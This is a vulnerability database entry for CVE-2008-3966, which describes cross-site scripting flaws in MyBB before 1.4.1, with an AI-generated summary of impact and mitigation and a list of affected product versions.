CVE-2008-3966
Description
Multiple cross-site scripting (XSS) vulnerabilities in MyBB (aka MyBulletinBoard) before 1.4.1 allow remote attackers to inject arbitrary web script or HTML via (1) a certain referrer field in usercp2.php, (2) a certain location field in inc/functions_online.php, and certain (3) tsubject and (4) psubject fields in moderation.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Multiple XSS vulnerabilities in MyBB before 1.4.1 allow remote attackers to inject arbitrary web script via referrer, location, and subject fields.
Vulnerability
MyBB (MyBulletinBoard) versions prior to 1.4.1 contain multiple cross-site scripting (XSS) vulnerabilities. The flaws exist in the handling of user-supplied input in the following files: usercp2.php (referrer field), inc/functions_online.php (location field), and moderation.php (tsubject and psubject fields). An attacker can inject arbitrary web script or HTML through these fields, which are then rendered without proper sanitization [1][2].
Exploitation
A remote attacker can exploit these vulnerabilities by crafting a malicious URL or form submission that includes the injected script in the referrer, location, or subject parameters. No authentication is required; the attacker only needs to trick a victim into visiting a crafted link or submitting a form that triggers the vulnerable code path. The injected script executes in the context of the victim's browser when the affected page is rendered [1][2].
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the victim's browser. This can lead to session hijacking, defacement, theft of sensitive data (e.g., cookies, form inputs), or other actions that the victim's session permits. The impact is limited to the privileges of the victim user, but can be escalated if an administrator is targeted [1][2].
Mitigation
The vulnerabilities are fixed in MyBB version 1.4.1, released on September 9, 2008 [1][2]. Users should upgrade to this version or later. No workarounds are documented in the available references. The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
31cpe:2.3:a:mybb:mybb:*:*:*:*:*:*:*:*+ 30 more
- cpe:2.3:a:mybb:mybb:*:*:*:*:*:*:*:*range: <=1.4.0
- cpe:2.3:a:mybb:mybb:1.00:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.01:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.02:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.03:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.04:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.0:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.1:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.2:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.3:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.4:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.5:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.6:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.7:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.8:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.0:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.1:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.10:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.11:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.12:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.13:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.2:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.3:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.4:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.5:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.6:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.7:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.8:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.9:*:*:*:*:*:*:*
- (no CPE)range: <1.4.1
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
6News mentions
0No linked articles in our index yet.